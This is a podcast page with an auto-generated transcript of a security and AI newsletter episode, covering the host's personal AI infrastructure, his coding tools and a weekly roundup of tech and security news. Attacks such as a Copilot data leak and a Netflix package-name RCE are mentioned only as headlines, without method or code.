All Episodes

June 18, 2025 • 36 mins

STANDARD EDITION: Netflix RCE, My Current AI Stack, All-in on Claude Code, and more...

You are currently listening to the Standard version of the podcast, consider upgrading and becoming a member to unlock the full version and many other exclusive benefits herehttps://newsletter.danielmiessler.com/upgrade

Read this episode online: https://newsletter.danielmiessler.com/p/ul-485

Subscribe to the newsletter at:
https://danielmiessler.com/subscribe

Join the UL community at:
https://danielmiessler.com/upgrade

Follow on X:
https://x.com/danielmiessler

Follow on LinkedIn:
https://www.linkedin.com/in/danielmiessler

Become a Member: https://danielmiessler.com/upgrade

See omnystudio.com/listener for privacy information.

Mark as Played
Transcript

Episode Transcript

Available transcripts are automatically generated. Complete accuracy is not guaranteed.
S1 (00:17):
All right. Welcome to episode 45. Posted a bunch of
fabric extractions of stuff that I've been watching and reading
and stuff like that. So like YouTube videos, blog posts,
academic papers, and I think I'm going to do more
of this because I'm actually building this into my Pi,
which is pi personal AI infrastructure. And this is the
infrastructure you've heard me talking about in the augmented class.

(00:40):
And just like all over X and in the newsletter
over the years, this is basically the back end core
infrastructure that I basically runs for my life. So it's
basically finding all my content. It's categorizing all my content, labeling, sorting,
doing things like that, extracting summaries, um, you know, characterizing.

(01:02):
And I'm basically going to use that to continue enhancing
my life. Right. So I'm always adding to this thing.
So one of the core components of that is actually
finding new content, um, in an automated way. So basically
there's I'll give you a good example. There's on arXiv.
I think that's the way you pronounce this. I've heard

(01:22):
people say this, I used to call it arXiv because whatever.
I'm silly. arXiv, I guess it's called arXiv. It's a
cool name. It's a better name than arXiv, although that's
how it's spelled. But whatever on arXiv there is a
RSS feed for. CS I so it's papers coming out

(01:48):
of arXiv that are both CS related and AI related.
And obviously this is a sweet spot for me. So
I want to be able to go and get those papers.
But I also want to know how high quality they are, like,
what are the interesting claims that they're making? Like how
good was their methodology, their testing? Like, was it a

(02:08):
meta study? Did they do their own independent research for
the paper, like all those combinations. And there's already a
fabric pattern for this, which is analyze paper. And I
think I have a new version of it as well.
But anyway, I want to do that type of automated
analysis on every paper I might want to read. Okay.
This is kind of giving you hints of like what

(02:30):
my personal AI infrastructure does. And by the way, I'm
aware of the fact that I'm saying like a little
bit too much. So I'm trying to tamper that down.
I like the word. I think it's a cool transition word,
but I don't want to use it 40 times in
every sentence. Anyway, this is the infrastructure that I'm actually building,

(02:51):
and this is one of the modules that's really, really
important to me because it's not just papers. I want
to see this for open source intelligence. I want to
see this for all the different stuff. So these are
all the independent modules that I'm building. And actually those
essentially turn into products for me. Right. So my Intel
product is going to be the output of one of these.

(03:11):
Threshold is already the output of several of these, right?
So anyway, that's just a brief little thing on my pie. Pie.
All that to say that these fabric extractions are essentially
outputs from these modules where it's found a piece of

(03:31):
really unique content, or I manually found it and I
just manually ran, uh, fabric against it. And it outputted
this output so you could check it on X, you
could see it on, you know, it. I do a
few of these in the newsletter every once in a while,
but I find it really useful to go and extract predictions,
to extract wisdom, to extract insights, or is another one

(03:54):
of my favorite. There's also one that just extracts quotes,
which can also be really interesting. There's um, I think
there's a one that just extracts like data or recommendations.
I think there's definitely a recommendations. One, actually, now that
I think about it, I need to have one that
extracts like a book list or a watch list. Um,

(04:16):
I'm not sure if I already made that one or
if I need to go add that to fabric. Anyway,
all this to say, I want my pi Pi always
running in the background, always collecting, always finding, always discovering,
always rating. And before you think, well hold on, I
is doing too much work for you. No, it is

(04:39):
not doing too much work for me. And here's why.
Part of this entire thing is the determination of what
I should go and do slowly. Okay? Anything that makes
it into that bucket, I must sit down and manually
enjoy and listen to and process and use my pen

(05:00):
and my index cards and write down notes or Apple
notes or whatever it is if I have to pause
this thing. But I still think the absolute best way
to experience anything is in the slow form, right? What's
still the best possible way to spend an evening is
with friends and family and smart people or whatever, and

(05:22):
you're basically having conversation with actual humans. So to me,
all this AI stuff, the whole purpose of it is
to enhance your ability to do those things. And this
is still this is all part of human 3.0. It's
all part of like, what should we actually be doing?
And what we should actually be doing is magnifying human experience.

(05:43):
Slow experience. Right. All this speeding up and all this
collection and all this, I should be in service of that,
not in opposition to that. All right. That's how we
get stuck on the first item. Not even getting into
the newsletter. Okay. Yeah. Go sign up for the podcast again,

(06:04):
which is silly because you're already listening to it. Uh,
let's see here my friend Tracy Talbot is presenting Tell
No Lies. Teaching AI to know when it doesn't know. Yeah,
to know when it doesn't know. And this is June
26th in Austin, and she's got a LinkedIn post that
I linked in the newsletter. I worked with her at Apple.

(06:25):
She was extraordinary there at Apple. She was doing data quality, uh,
on our team. And yeah, just really, really great person and, um,
really thoughtful about data quality and data security and all
these different aspects of data and basically data management at

(06:48):
scale and thinking about what it means to trust data.
So now she's getting into AI, and she's been doing
a whole lot of really cool stuff with that. So
definitely recommend going to see her talk again. That's June
26th in Austin. All right. Places I'm going to be
speaking in 2025, and I realized I missed an item

(07:09):
on the list. Various talks and panels. Blackhat USA in
Vegas speaking at the Swiss Cyberstorm in Bern, Switzerland. It's
going to be an AI workshop. Actually, I'm going to
do a workshop for people, which is going to be
a combination of like augmented fabric slash, essentially like personal
AI infrastructure is kind of what that thing's going to

(07:30):
be about. Keynoting Appsec USA in DC in November and
speaking at Blackhat Mia in Saudi Arabia in December. And
the one that I missed is I'm probably going to
be doing something in Sweden as well. Um, I can't
remember the exact date for that one, but, uh, yeah,

(07:51):
I'll probably add that to the list for this next
coming newsletter. On Monday, personal tech Stack updates I'm all
in on cloud code. I'm not going to go into why,
but ultimately it's because here I am going into why, uh,
anthropic uses this as their agentic coding agent, and they've

(08:13):
gone all in on Agentic coding, which means this thing
isn't like hacking together agents. It's actually using agents to
execute the various tasks. And as of today, I just
updated cloud code and now it has planning built in.
So as I've been talking about pretty much everywhere, I
think scaffolding around AI is the superpower that's about to

(08:38):
unlock this whole thing, because the models are already smart.
The problem is they can't think for long. They have
short memories. So we have all these context problems. So
any any person, any intelligent being gets really stupid when
it can't remember longer than, you know, a short conversation.

(09:00):
And then you have to go back into this stored
memory bank. And it's not perfect. I'm talking about rag,
for example. Or if you have actual humans and they
struggle with long term memory or even short term memory,
obviously they're going to be less functional, right? They're going
to be less capable than they used to be before
they lost those abilities. So the ability to um, as

(09:25):
Dwarkesh talks about, learn on the job. Okay. You think
about a knowledge worker. They go in, they do orientation,
they learn on the job. Okay. Guess what? After that
first week, they're way better than when they started because
now they have some knowledge. Well, what happens after six months?
What happens after a year? What happens after they've been
there for 20 years. They now have all this stored

(09:48):
knowledge about this company, which is now part of their context.
But the difference is with a human, they are naturally, fluidly.
Every time they make a decision, they are thinking of
their stored knowledge. They incorporate all of their decisions with
their stored knowledge every time they make any decision. That

(10:10):
is a thing that I currently cannot do. It is struggling.
It's like, oh, I've got to go grab all this
context and stuff it into the prompt. How do you
grab context of 25 years of learning at a job?
How do you know what that even means? How do
you even know what to query to stuff into your

(10:32):
decision making process? This is completely transparent with humans. When
we are like, oh, let me approach this problem from
a holistic standpoint. Let me talk to talk to all
these disparate teams across the org. And I'm going to
gather notes and I'm going to take notes. I'm going
to write them down or whatever. Your brain is going
crazy with all of its knowledge that you've gathered over

(10:53):
these 25 years, and it's making its own queries and
pulling back that context. And these are coming back to
you as kind of like insights or thoughts or creativity.
You're not getting to see exactly what the queries look
like or even what the returned results look like. We
do not have this with AI. We must manually go

(11:16):
and make manual queries into context, like with rag or
like with stuffing other context or context summaries into the
prompts themselves, right? This is the scaffolding that we need.
We need to emulate the process that humans execute naturally
every day, you know, hundreds or thousands or millions of times.

(11:39):
However many times it is that we're making decisions and
little tiny, you know, nano decisions and micro decisions. So
I don't remember how I got onto this, but scaffolding massively,
massively important. And, uh, that's why I think context is,
is so important to all of this stuff. Um. Oh,

(12:01):
I remember how Claude Cote. So they are all in
on the agent stuff, and they are all in on
the planning component. Okay, this planning component is yet another
piece of what I just talked about. It is, you know,
keeping in mind what we're trying to do overall and
then checking off little boxes of like, yeah, we've done this. Yeah,

(12:21):
we've done this. It's all about, uh, context management. Now
context is a little bit, um, overloaded here. I would
say context planning management. Um, learning on the job management,
long term task management. These are the types of things
that really good knowledge workers, like a principle engineer who's

(12:47):
been somewhere for 25 years. These are the types of
things that they are really good at. And these are
the things in my opinion, this is a prediction and
this is just my prediction, is that we're going to
see major advances in those areas, which are actually kind
of like tricks. This is what I've been telling my friend, uh,

(13:08):
Joel ever since 23, that these types of tricks are
the things that are going to push us over the edge.
These are the types of tricks that are going to
hyper jump. I way further ahead. And I think what
I think my theory has been borne out through things
like Post-training post-training is not fundamentally better neural nets. It's

(13:33):
better ways of shaping and getting neural nets to do
what we actually want them to do. Right. So just
zooming out, I think Cloud Code has this figured out.
I think anthropic really deeply understands this. And they are
building agents and planning management and context Management. They're doing really,

(13:56):
really well with it in a way that I'm just
really excited to build things with cloud code in a
way that's not really hitting for me. Uh, on the
other platforms, my secondary backup for cloud code is still cursor. Um,
I was messing with, uh, windsurf for a while and
some other tools, and I still dabble with all the

(14:18):
other tools when I see something, uh, come out or new,
I go and tinker with it. But right now, cloud
code is my main, with cursor being secondary. I'm also
switched over to using Dia as my main daily driver
for my browser. And um, I'm on all the Mac
OS 26 betas. They are fantastic. And uh, specifically having

(14:43):
your phone app on the desktop is fantastic. And, uh,
the podcast app is much improved. You can actually go
above the two x limit. You can go up to
three x now. And yeah, overall I would say Apple
just really did a lot of quality updates. For example
AirPod handoffs are much better. So that's it for updates

(15:07):
I think. And let's get into cybersecurity. Apple quietly fixed
an iPhone zero Day that was used against journalists. Echo
leak using uses markdown syntax to bypass Microsoft 365 Copilot security.
So some researchers found a smart way to steal data
from Copilot by using obscure markdown link formats that Microsoft

(15:31):
did not filter. Researchers turn 2 a.m. Tokyo hotel room
chat into a Netflix RC. So Chubbs, who is a
friend of mine and very, very good, um, attacker, uh, attacker. Um,

(15:51):
what are we saying? Researcher. Bug. Bounty guy. Um. Security
guy focused on offensive security and automated testing. He's also
the creator of Asset note. So he's just one of
the top, you know, top 1% or 1% of the 1%.
I would put him in Sam Curry like up in
that top, top echelon. And, uh, basically they found, uh,

(16:17):
the way they found a way to attack an unclaimed
internal package name called NFC logger. And they use that
to get Archie actually on a Netflix, uh, system or
within Netflix itself. And I'm sure they fixed that. Otherwise
we wouldn't be talking about it. All right. Going to

(16:39):
skip over the Tliose sessions. Uh, offer. That was in
the thing. Uh, don't really want to talk about that. Um,
HTML spec now escapes angle brackets and attributes. Tributes, so
Chrome and other browsers are now going to start escaping
left and right. Caret characters in HTML attributes to prevent

(16:59):
mutation XSS attacks Interpol dismantles 20,000 malicious IPS linked to
69 malware variants. Cursor security rules project tackles unsafe AI
generated code, Europol says Europol yeah, Europol says stolen data

(17:20):
has become the new underground currency. Phishing messages this is
a quote created by Llms have higher success rate than
those written by humans. And this is a euro pool.
Io CTA report US airlines quietly selling flight data to DHS. Yeah.

(17:41):
Government agencies can search 39 months of flight data, including
passenger names, itineraries, travel dates and credit card numbers, and
other people buying this data are include like the Secret Service, SEC, DEA,
and US Marshals Service. And that's in addition to the
DHS and all its various services. Amazon's AI agents can

(18:06):
build cyber defense signatures in minutes. National security thoughts on
Israel's action against Iran. I'm actually not going to go
super into this one. It's an evolving situation. As everyone knows,
new stuff is happening like every few hours on this, uh, go,

(18:26):
go read the newsletter if you want to see my
take on this. Army is commissioning Big Tech executives as
lieutenant colonel. So for Silicon Valley executives from meta, Palantir
and OpenAI are being brought in as lieutenant colonels to
speed up the government's adoption of technology. And I'm overall

(18:47):
for this, but I also have my spider senses going
off in terms of like dystopia type situation. Again, I,
I see the value of Palantir. I see the value
of winning at almost any cost against China. Right? That

(19:10):
is why I support this type of move from the
military and why I support overall. In some ways, companies
like Palantir and Andriel and you know why these companies exist? Yes,
we need to move super fast. Unfortunately, the cultures and
the ambitions and a whole bunch of externalities often come

(19:35):
with moving really fast and in really ambitious ways. In
with technology companies where you're making tons of money supporting
the military. I don't think I need to spell it out.
There's possibility for harm here, right? There's possibility for harm here.
And I think we have to take that risk. I

(19:57):
think this is the right move to take that risk.
But holy crap, is it scary? Yes. And do we
need oversight? Yes. Do we need to be extremely careful? Yes.
Do we need to not turn our eyes away and
just hope it all works out? Absolutely. Cheap drones will
massively disrupt current large military dominance. Yeah. Israel and Ukraine

(20:21):
are showing that $500 drones can destroy extremely expensive military gear,
which could upend the advantage of countries like, you know, Russia,
the US. We're already seeing it with Russia in Ukraine. Uh,
big scope aside on this one. I'm curious about how

(20:42):
this is going to start trickling into consumer and personal security.
Like when will executive production teams all need to have
like Anti-drone tech as part of their package? I think
probably sooner rather than later. I that apple paper saying
eyes don't reason was highly flawed, and someone named Alex

(21:02):
Lawson says that the paper basically didn't do a good
job and it was easy to make better examples. Although
I've heard someone did a paper like this, this might
have been Alex Lawson. Actually, I don't know if it
was this paper. I heard somebody say that that whole paper,

(21:22):
this whole takedown paper was actually Claude generated, and it
wasn't a real paper. And it was just like, I
don't know, fake or hype or whatever, and that they
didn't expect it to blow up so much. I don't
know if it was this one, but interesting to note.
Also interesting to note, and I'm going to beat up
on myself here for a second. I don't know if

(21:47):
this was the paper that said that it doesn't actually
matter if I know, or it doesn't actually matter if
it was the paper or not. The fact that I
put it in the newsletter is potentially a strike against me.
Think about this. I counted as a strike against myself. Um,

(22:09):
the thing is, I'm not sure if I would do
it differently. It's just maybe I, I don't know. This
is weird. Okay. Because when I put something in the
newsletter and I talk about it, how much of a
high how much have I endorsed this thing and said
for sure that this is a real paper? For sure.
These are real results because I read the paper fully.

(22:33):
Not only that, but I looked at the all the
testing methodologies and I evaluated the data and I confirmed
that their testing was not a lie. That is a
level of depth that I cannot do. For the amount
of papers and stories that I'm doing. So what I'm
saying is it is possible for me to be duped. Um,

(22:55):
and this one very well could be, uh, in fact,
you know what? I'm going to click on a link
here and see if there's possible, like updates. I don't
think so. I don't think so. I don't think it applied.
It doesn't actually matter if it applied. This paper that
I included might be completely legit. And I think it is,

(23:16):
but it doesn't actually matter because this strike against me
still counts, right? So this is a question from me
to myself and also from you to me and from
me to you, to me. You got to watch what
people are posting, and you got to watch with how
sure that they are that that thing is actually real

(23:40):
And whether or not they're just using something that sounds
real to support their own opinion. This one happened to
go with my opinion. Oh, so what do you know? Magically,
I just included in the newsletter as support for my opinion. Well,
what if it turns out there was complete garbage? Well
then I'm just like anyone else who is posting a

(24:01):
random garbage. I would argue I'm not like that, but
I'm saying it looks kind of the same, so I
don't really care how much the difference is. So just
keep in mind. And not just for me, but for yourself.
You got to watch for whether or not evidence that's
coming in is only air quote evidence, because how much

(24:22):
time have you actually spent looking at the evidence, redoing
the paper yourself, you know. And so how much are
we using external validation or citations pointing to a paper
Or as support for the paper being legit. And I

(24:43):
think it gets more and more serious the further we go. Um,
the good news is, a big part of my personal
AI structure is going to be to find stuff like this. Uh,
I want to be able to find stuff like this
with my AI infrastructure where it's like, I don't know,
seems like they use a lot of, uh, catchy AI
terms in here, and it looks like they were really

(25:04):
hand-wavy with their examples. Like, I want to be able
to catch this stuff for myself. Just something to keep
in mind. OpenAI's O3 Pro is very smart, but context hungry. Agreed.
Man killed by police after spiraling into a ChatGPT driven psychosis.
Google plans to cut ties with scale AI because basically

(25:26):
meta bought like half of them or something. CIO wants
to clone staff as digital twins and AI agents. UC
San Diego CIO wants to extract knowledge from experienced IT
staff and create digital twins that handle routine problems. Well, yeah, obviously,
you know, you got somebody, uh, greybeard, you know, Chris Myers,

(25:51):
who's been at the company for 41 years, and they
know everything. And anyone who, you know, finds something broken
that nobody could fix, they all call Chris Myers. So
the CEO is like, let's go find Chris Myers. Let's
go interview him for seven weeks in a dark, padded
room and pull out all of his knowledge and put

(26:12):
that into an AI agent. And now you could just
ask a virtual Chris Myers. Well, obviously we need this
for everything, right? We need this for the best doctors.
We need this for the best psychiatrists. We need this
for everything. This is you know, this is the problem. When,
you know, extremely experienced people leave a company, you lose
all the knowledge that they, uh, took with them. And

(26:36):
unfortunately also for I, it's also knowledge that you can't
possibly extract from them efficiently, right? You can't possibly ask
enough questions to to gather their knowledge. Their knowledge is,
let's call it infinite. 41 years of knowledge essentially baked

(26:56):
into an AI model. That's a great analogy actually it.
How many questions do you have to ask? You know, uh,
O3 to get all of O3 knowledge out of it?
The answer is an infinite number of questions. So it
doesn't matter how much you interview Chris Myers, who's been

(27:18):
there for 41 years, you're not going to get enough. Right?
So so this is a serious challenge. ChatGPT dominates LLM
usage at 80%, 86% market share. I did not know
it was that high technology fabric. Summary of the massive
Google outage. Yeah. This is this is really cool. Um,

(27:40):
so they put out the, you know, Google put out
their their giant paper saying what happened. And when I see,
you know, a 14 page paper or whatever. And it's
about an outage and describing an outage, it's not like
deep human knowledge that I'm getting. That's where I run Extraction's.
So I've got this, um, pattern called create story explanation,

(28:03):
create underscore story story underscore explanation. It is one of
my favorite patterns. It explains anything at like a ninth
grade level in kind of a story format. So this happened,
then this happened, then this happened. And it's just very clear.
So I recommend checking it out if you care about

(28:26):
that outage, but more importantly using it against other stuff.
YouTube officially beats all other streaming platforms. In US viewership,
they have 13% of all US TV viewership. Oh, wow. Okay.
I thought it was 13% of streaming. Okay, I read
that wrong. 13% of all US TV viewership. That's insane.

(28:55):
That's insane. Okay, YouTube by itself, 13% of TV. Yeah,
it seems very high. I bet you that goes up
crazy amounts in the next few years. It's basically the
only TV that I watched. I was actually at a
resort yesterday in Napa, and they only had regular TV,
and it was like it was like a commercial rectangle.

(29:19):
All I did was watch commercials and occasionally they would
show like part of a show. Anyway, Amazon joins the
big nuclear party buying 1.2GW, uh, for AWS. tvOS 26
hints at built in camera for a new Apple TV 4K.
I wish it was an Apple TV 8-K, and I

(29:40):
wish it had ten Gigabit Ethernet. That's what I wish.
But I would like to see a camera because I'd
like to do FaceTime with, um, in the living room
sitting on the couch. That would be nice. I also
don't want a camera facing the living room, so I
would need one of those flip dongle cover things. Apple's

(30:01):
iPad OS 26 finally makes the iPad a real computer.
Everyone is talking about this. People are saying that this
actually allows you to use an iPad as a laptop,
almost like very closely. And it's kind of been universal
that people are saying, Holy crap, this is really, really good.

(30:22):
I have not. I don't use my iPads much. And
the reason is I just didn't like the OS. The
only thing that I use it for is reading and
drawing and sketching and doing stuff like that with like freeform.
And for that I really love it. And for reading,
I really love it. But I don't use it as
a computer because I prefer laptops. Maybe that will change

(30:46):
the argument that it's time to kill Siri. I did
not know that I believe this, but I definitely do.
I think once Apple fixes its AI interface, its universal
AI to life OS that I've been talking about, they
need to call it something new. Siri has too much baggage. I.

S2 (31:07):
I can show them if you ask.

S1 (31:09):
Hey Siri, stop the one time Siri actually listens when
I'm trying to record, um, it essentially that system does
not turn on and turn off lights reliably. It has
so many problems. It's been over ten years. It had
its attempt. It had its chances, and now it needs

(31:31):
a new name. I thoroughly believe this. It's just a
marketing concept. When you have enough bad baggage associated with something,
you got to flip it over. You got to retire it.
Nvidia writes off China revenue in company forecasts because, you
know it's too unpredictable. With the current administration, Waymo rides
cost more than Uber or Lyft, but people are happy

(31:52):
paying it so often 5 or $10 more for a
ride versus like Uber or a taxi. But people are
still paying it and they're still making money because it's
so much of a better experience. Humans. Trump ends protection
for Afghans as Congress scrambles to intervene. I'm really upset
about this, really upset that these Afghanis who had helped

(32:18):
the US military during the war and who cannot go
back because they are being hunted by the Taliban and
because their families are under like watch by the Taliban,
they are in grave danger. Their families are and they are.
And if they go back and try to link with
their families because they're forcibly kicked out of the US,

(32:42):
it is essentially damning them and their families, potentially to die.
And this is after they served and sacrificed essentially for
the US military. I do not believe we should treat
allies like that. Robin I system makes first autonomous scientific discovery.

(33:03):
So this is future houses. Robin I so I talked
about this story of automated, you know, science assistance. And
this is even more it's more end to end the
entire research process. So it, um, it discovered that ripasudil
could treat dry macular degeneration by orchestrating multiple specialized agents

(33:28):
to handle the entire research process autonomously in just 2.5 months.
And who knows how much of that is like the
entire air quotes entire research process, but supposedly it went
end to end and actually worked. So this is the
type of thing that I think is really, really exciting.

(33:50):
Ultra black paint might solve satellite light pollution crisis. Although
I'm curious, wouldn't you just see black dots moving through
your pictures, blocking out stars and, you know, the moon
or whatever? I guess the black dots wouldn't be as annoying.
It seems like they could still overwrite stars. If you

(34:12):
are trying to take a picture of the starry sky,
you might still see artifacts, but it won't be nearly
as bad as like a bright white line Him drawing
over your picture, actually multiple bright white lines. But, uh,
I wonder how possible this is, like, are we going
to pull all the ones that are up there down?

(34:33):
Are we going to paint the ones that are up there? Doubtful.
So this would involve painting all the new ones that
are going up, which unfortunately is many thousands. And the
Pentagon has evidently been pushing Americans to believe in UFOs
for decades. And evidently, according to this report, this is

(34:53):
to cover up actual secret weapons programs. So they basically
circulate this stuff on purpose to get people talking about
a red herring discovery. Fiddle ITM brings malicious traffic detection
to man of the middle proxy. Oh, I'm not going
to actually read all of these, so I'm just going
to scroll through and look for some really cool ones,

(35:14):
or if any are from my friends. Let's see. Boom
boom boom boom. Oh, Sam Altman's gentle singularity. You probably
want to read this one. I've also got a fabric
extracted predictions that comes out of it in the newsletter,
so check that out. And yeah, I think that's about it. Okay,
this is the end of the standard edition of the podcast,

(35:36):
which includes just the news items for the week to
get the rest of the episode, which includes much more
of my analysis, the ideas section, and the weekly member essay.
Please consider becoming a member. As a member, you get
access to all sorts of stuff, most importantly, access to
our extraordinary community of over a thousand brilliant and kind
people in industries like cybersecurity, AI, and the humanities. You

(35:56):
also get access to the UL Book Club, dedicated member
content and events, and lots more. Plus, you'll get a
dedicated podcast feed that you can put into your client
that gets you the full member edition of the podcast
that basically doesn't have this in it, and just goes
all the way through with all the different sections. So
to become a member and get all that, just head
over to Daniel Music.com. That's Daniel Miessler, and we'll see

(36:18):
you next time.
Advertise With Us

Popular Podcasts

United States of Kennedy
Stuff You Should Know

Stuff You Should Know

If you've ever wanted to know about champagne, satanism, the Stonewall Uprising, chaos theory, LSD, El Nino, true crime and Rosa Parks, then look no further. Josh and Chuck have you covered.

Dateline NBC

Dateline NBC

Current and classic episodes, featuring compelling true-crime mysteries, powerful documentaries and in-depth investigations. Follow now to get the latest episodes of Dateline NBC completely free, or subscribe to Dateline Premium for ad-free listening and exclusive bonus content: DatelinePremium.com

Music, radio and podcasts, all free. Listen online or download the iHeart App.

Connect

© 2025 iHeartMedia, Inc.